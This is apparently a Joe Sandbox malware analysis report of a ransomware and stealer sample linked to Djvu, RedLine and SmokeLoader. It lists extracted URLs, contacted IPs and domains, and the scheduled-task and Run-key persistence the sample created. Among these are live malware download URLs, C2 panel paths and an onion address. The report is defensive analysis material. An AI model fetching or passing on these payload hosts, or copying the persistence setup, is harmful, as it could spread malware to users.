http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6ResponseD	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://iplogger.com/2Xtsj4MZ	5DA4.exe, 0000002D.00000003.2777379668.0000024CB8F23000.00000004.00000020.00020000.00000000.sdmp	false		high
https://we.tl/t-xN3VuzQl0a	958B.exe, 00000018.00000002.4500855997.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000018.00000002.4503071457.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000024.00000002.4500853338.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000024.00000002.4500853338.00000000007D5000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://79.137.192.18/9bDc8sQ/index.php399001	yiueea.exe, 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13ResponseD	AppLaunch.exe, 00000011.00000002.2885619931.00000000075C5000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://turnitin.com/robot/crawlerinfo.html)cannot	2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.reddit.com/	958B.exe, 00000018.00000003.2741232460.0000000009920000.00000004.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://t.me/cahalg#)	build2.exe, 0000002A.00000002.2774337938.000000000256D000.00000040.00000020.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id1ResponseD	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onionhttp://eir5kdrltavou3c2wgqszfyt	2899.exe, 00000028.00000002.4508468054.000000000E4E0000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonm	958B.exe, 00000027.00000002.2749683074.0000000000778000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exe$run1Y	958B.exe, 00000018.00000002.4500855997.0000000000647000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://databaseupgrade.ru	2899.exe, 00000028.00000002.4508468054.000000000E48E000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4508468054.000000000E488000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://79.137.192.18/9bDc8sQ/index.phpy	yiueea.exe, 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false		high
http://https://_bad_pdb_file.pdb	2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21ResponseD	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000011.00000002.2885619931.0000000007675000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.json8	958B.exe, 00000024.00000002.4500853338.0000000000772000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.google.com/feedfetcher.html)HKLM	2899.exe, 00000028.00000003.2776648258.0000000005A80000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000400000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	false		high
http://79.137.192.18/9bDc8sQ/index.phpa	yiueea.exe, 00000017.00000002.4500899818.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://blockchain.infoindex	2899.exe, 00000028.00000002.4506634971.0000000005190000.00000040.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	build2.exe, 0000002C.00000003.2842474751.000000000E8EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://79.137.192.18/9bDc8sQ/index.phpS	yiueea.exe, 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id10ResponseD	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000011.00000002.2885619931.0000000007675000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://79.137.192.18/9bDc8sQ/index.phpW	yiueea.exe, 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id5Response	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false		high
http://79.137.192.18/9bDc8sQ/index.phpO	yiueea.exe, 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id15ResponseD	AppLaunch.exe, 00000011.00000002.2885619931.000000000746C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://49.12.118.151/6R	build2.exe, 0000002C.00000002.2966408279.0000000002456000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://word.office.comon	explorer.exe, 00000002.00000000.2111564853.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://79.137.192.18/9bDc8sQ/index.php398001	yiueea.exe, 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://eir5kdrltavou3c2wgqszfyte3jeg76hphm7fps7b7zhl4pokr5v6mqd.onion	2899.exe, 00000028.00000002.4508468054.000000000E4E0000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4508468054.000000000E48E000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id8Response	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://95.214.27.254/getfile/taskhost.exee	yiueea.exe, 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.amazon.com/	958B.exe, 00000018.00000003.2740070993.0000000009920000.00000004.00001000.00020000.00000000.sdmp	false		high
http://95.214.27.254/getfile/taskhost.exei	yiueea.exe, 00000017.00000002.4500899818.0000000001009000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://zexeq.com/files/1/build3.exe$run	958B.exe, 00000018.00000002.4500855997.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, 958B.exe, 00000018.00000002.4500855997.0000000000647000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://schemas.micro	explorer.exe, 00000002.00000000.2110216171.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2110915592.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2110876026.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.twitter.com/	958B.exe, 00000018.00000003.2741345583.0000000009920000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	958B.exe, 0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/D	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/06/addressingex	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	958B.exe, 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	AppLaunch.exe, 00000011.00000002.2885619931.0000000007291000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	AppLaunch.exe, 00000011.00000002.2885619931.000000000732A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsons	958B.exe, 00000027.00000002.2749683074.0000000000738000.00000004.00000020.00020000.00000000.sdmp	false		high
https://databaseupgrade.ruhttps://databaseupgrade.ru	2899.exe, 00000028.00000002.4508468054.000000000E488000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.143.166.163	lightseinsteniki.org	United States	2686	ATGS-MMD-ASUS	true
51.255.152.132	unknown	France	16276	OVHFR	true
104.198.2.251	snukerukeutit.org	United States	15169	GOOGLEUS	false
79.137.192.18	unknown	Russian Federation	42569	PSKSET-ASRU	true
213.6.54.58	alayyadcare.com	Palestinian Territory Occupied	12975	PALTEL-ASPALTELAutonomousSystemPS	true
91.106.207.50	mikolyda.beget.tech	Russian Federation	198610	BEGET-ASRU	false
14.33.209.147	zexeq.com	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
172.67.213.185	loveperry.org	United States	13335	CLOUDFLARENETUS	true
49.12.118.151	unknown	Germany	24940	HETZNER-ASDE	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
35.205.61.67	sumagulituyo.org	United States	15169	GOOGLEUS	false
172.67.139.220	api.2ip.ua	United States	13335	CLOUDFLARENETUS	false
95.214.27.254	unknown	Germany	33657	CMCSUS	false
211.104.254.139	wirtshauspost.at	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
172.67.196.133	montereyclub.org	United States	13335	CLOUDFLARENETUS	true
171.22.28.219	unknown	Germany	33657	CMCSUS	true
187.18.108.158	colisumy.com	Brazil	22689	SercomtelParticipacoesSABR	true
91.215.85.209	onualituyrs.org	Russian Federation	34665	PINDC-ASRU	true
45.130.41.106	hoffmanlevi.space	Russian Federation	198610	BEGET-ASRU	false
91.227.16.22	h171008.srv22.test-hf.su	Russian Federation	207027	EXIMIUS-ASRU	true
91.215.85.17	stualialuyastrelia.net	Russian Federation	34665	PINDC-ASRU	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1325280
Start date and time:	2023-10-13 15:19:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	49
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@75/177@41/21
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 77 Number of non-executed functions: 180
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, BackgroundTransferHost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 142.250.188.227, 20.189.173.22, 142.250.68.35
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, bluesaks.fun, onedsblobprdeus17.eastus.cloudapp.azure.com, edgedl.me.gvt1.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, manguvorpmi.pw, www.gstatic.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:20:20	API Interceptor	313614x Sleep call for process: explorer.exe modified
15:20:29	Task Scheduler	Run new task: Firefox Default Browser Agent 8A16508DBB57C718 path: C:\Users\user\AppData\Roaming\vusretg
15:20:57	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe s>--Task
15:20:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
15:21:03	API Interceptor	1x Sleep call for process: WerFault.exe modified
15:21:04	Task Scheduler	Run new task: yiueea.exe path: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
15:21:04	API Interceptor	21960x Sleep call for process: yiueea.exe modified
15:21:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
15:21:09	API Interceptor	1x Sleep call for process: 958B.exe modified
15:21:11	API Interceptor	72x Sleep call for process: AppLaunch.exe modified
15:21:17	API Interceptor	6x Sleep call for process: 2899.exe modified
15:21:32	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
15:21:38	Task Scheduler	Run new task: Firefox Default Browser Agent 6BF1062B4E999969 path: C:\Users\user\AppData\Roaming\afsretg

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.143.166.163	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader	Browse	liuliuoumumy.org/
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, SmokeLoader	Browse	liuliuoumumy.org/
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	liuliuoumumy.org/
51.255.152.132	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader, Vidar, Xmrig	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	Amadey, Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader	Browse
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Djvu, Glupteba, RedLine, SmokeLoader, Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mikolyda.beget.tech	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	91.106.207.50
mikolyda.beget.tech	SecuriteInfo.com.Trojan.Siggen21.39969.28914.25909.exe	Get hash	malicious	Amadey, Babadeda, Healer AV Disabler, Mystic Stealer, RedLine, SmokeLoader	Browse	91.106.207.50
accounts.google.com	https://www.erhealthplans.com/RKduHZzY/d?url=pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZ#pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZMAYYY2hyaXN0aWUuYmFlejFAc3NzcHIuY29t	Get hash	malicious	Unknown	Browse	172.217.14.109
	https://iqr.li/m5f	Get hash	malicious	HTMLPhisher	Browse	142.250.68.45
	med7Zo1xDp.exe	Get hash	malicious	Unknown	Browse	142.250.68.45
	file.exe	Get hash	malicious	Amadey, Babadeda, Healer AV Disabler, RedLine, SmokeLoader	Browse	142.250.68.109
	Gsk-Lux.html	Get hash	malicious	HTMLPhisher	Browse	142.250.217.141
	file.exe	Get hash	malicious	Amadey, Babadeda, Healer AV Disabler, RedLine, SmokeLoader	Browse	142.250.72.141
	file.exe	Get hash	malicious	PrivateLoader	Browse	142.250.68.77
	file.exe	Get hash	malicious	Amadey, Babadeda, Healer AV Disabler, RedLine, SmokeLoader	Browse	142.250.188.237
	file.exe	Get hash	malicious	Amadey, Babadeda, Healer AV Disabler, RedLine, SmokeLoader	Browse	142.250.72.141
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader	Browse	142.250.72.173
	file.exe	Get hash	malicious	Amadey, Babadeda, Healer AV Disabler, RedLine, SmokeLoader	Browse	142.250.68.109
	https://storage.googleapis.com/bigchangewillhappendinyourlife/in17.html	Get hash	malicious	Unknown	Browse	142.250.72.173
	https://storage.googleapis.com/bigchangewillhappendinyourlife/in17.html	Get hash	malicious	Phisher	Browse	172.217.14.109
	https://kpai7ycr7jxqkilp.tor2www.com/6bf9	Get hash	malicious	Unknown	Browse	172.217.12.141
	file.exe	Get hash	malicious	Amadey, Babadeda, Healer AV Disabler, RedLine, SmokeLoader	Browse	142.250.188.237
	https://asianaviation.us16.list-manage.com/track/click?u=597ed8b7fb8cbaf769d22bb2d&id=e4f960b3b2&e=7d67b2b1ba	Get hash	malicious	Unknown	Browse	142.250.68.77
	file.exe	Get hash	malicious	Amadey, Babadeda, Healer AV Disabler, RedLine, SmokeLoader	Browse	142.250.188.237
	http://oopatet.com	Get hash	malicious	Unknown	Browse	142.250.72.173
	voicemail.html	Get hash	malicious	Unknown	Browse	172.217.14.77
	file.exe	Get hash	malicious	Amadey, Babadeda, Healer AV Disabler, RedLine, SmokeLoader	Browse	142.250.72.141
colisumy.com	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	187.212.189.11
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, SmokeLoader	Browse	187.209.177.209
	file.exe	Get hash	malicious	Amadey, Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader	Browse	187.212.189.11
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	189.169.83.249
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader	Browse	187.204.6.164
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	185.12.79.25
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	175.126.109.15
	wgdE3POxOg.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	211.181.24.132
	file.exe	Get hash	malicious	Amadey, Babuk, Djvu, RedLine, SmokeLoader, Vidar, Xmrig	Browse	185.12.79.25
	ioMJg2xHZQ.exe	Get hash	malicious	Babuk, Djvu, RedLine, SmokeLoader	Browse	175.120.254.9
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader, Vidar	Browse	186.50.155.198
	file.exe	Get hash	malicious	Babuk, Djvu, Glupteba, RedLine, SmokeLoader	Browse	200.92.136.254
	file.exe	Get hash	malicious	Babuk, Djvu, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Vidar	Browse	190.141.134.150
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse	210.182.29.70
	file.exe	Get hash	malicious	Babuk, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse	123.213.233.131
	file.exe	Get hash	malicious	Babuk, Djvu, RedLine, SmokeLoader, Stealc, Vidar, Xmrig	Browse	180.94.156.61
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse	175.126.109.15
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader, Stealc	Browse	187.134.80.172
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse	95.158.162.200
